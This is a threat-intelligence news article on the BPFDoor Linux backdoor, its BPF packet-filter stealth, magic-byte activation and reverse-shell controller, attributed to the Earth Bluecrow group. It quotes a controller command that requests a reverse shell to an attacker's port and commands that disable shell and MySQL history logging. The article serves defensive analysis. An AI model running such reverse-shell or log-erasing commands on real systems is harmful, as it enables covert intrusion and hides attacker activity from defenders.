A sophisticated backdoor malware known as BPFDoor has been actively targeting organizations across Asia, the Middle East, and Africa, leveraging advanced stealth techniques to evade detection.
This Linux backdoor utilizes Berkeley Packet Filtering (BPF) technology to monitor network traffic at the kernel level, allowing it to remain hidden from conventional security scans while maintaining persistent access to compromised systems.
BPFDoor has been observed targeting telecommunications, finance, and retail sectors with recent attacks documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.
.png
)
The malware’s ability to operate without listening on network ports makes it particularly difficult to detect using traditional security measures such as port scans, allowing it to remain undetected for extended periods.
Trend Micro researchers noted the threat actor behind these attacks as Earth Bluecrow (also tracked as Red Menshen), an advanced persistent threat (APT) group that has been deploying BPFDoor for cyberespionage activities.
According to their telemetry, the group has been active for at least four years, with evidence of multiple incidents dating back to 2021.
The malware’s design enables it to inject BPF filters into the operating system’s kernel, where it can inspect network packets and activate upon receiving specially crafted “magic sequences” – predetermined byte patterns that trigger specific backdoor functions.
This rootkit-like capability allows BPFDoor to blend into the system, changing process names and employing other evasion tactics to avoid detection.
For organizations affected by BPFDoor, the implications are severe. The backdoor creates a persistent, nearly invisible channel for threat actors to access sensitive data and systems over extended periods, making it an ideal tool for long-term espionage operations.
Reverse Shell Mechanism: The Hidden Controller
At the heart of BPFDoor’s capabilities is its controller module, which enables attackers to establish reverse shell connections to infected hosts.
This functionality allows threat actors to dig deeper into compromised networks, facilitating lateral movement and access to additional systems and sensitive data.
The controller sends activation packets containing magic bytes (such as 0x5293 for TCP or 0x7255 for UDP), the remote IP address and port for the target to connect to, and an authentication password.
.webp)
When properly configured, this initiates a reverse shell connection from the victim machine back to the attacker’s system.
./controller -cd 22 -h 192.168.32.156 -ms 8000This command instructs the controller to request a reverse shell connection from the infected machine (192.168.32.156) back to the attacker’s machine on port 8000.
The malware authors incorporated measures to eliminate evidence of their activities on compromised systems:-
export MYSQL_HISTFILE=/dev/null
export HISTFILE=/dev/nullThese commands disable command history logging, suggesting the attackers specifically target systems running MySQL database software.
For network defenders, detecting BPFDoor remains challenging due to its ability to operate across multiple protocols (TCP, UDP, and ICMP) and the ease with which attackers can modify the magic byte sequences used for activation.
As this threat continues to evolve, organizations must implement advanced monitoring solutions capable of detecting the specific patterns associated with BPFDoor communications and activation sequences.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial
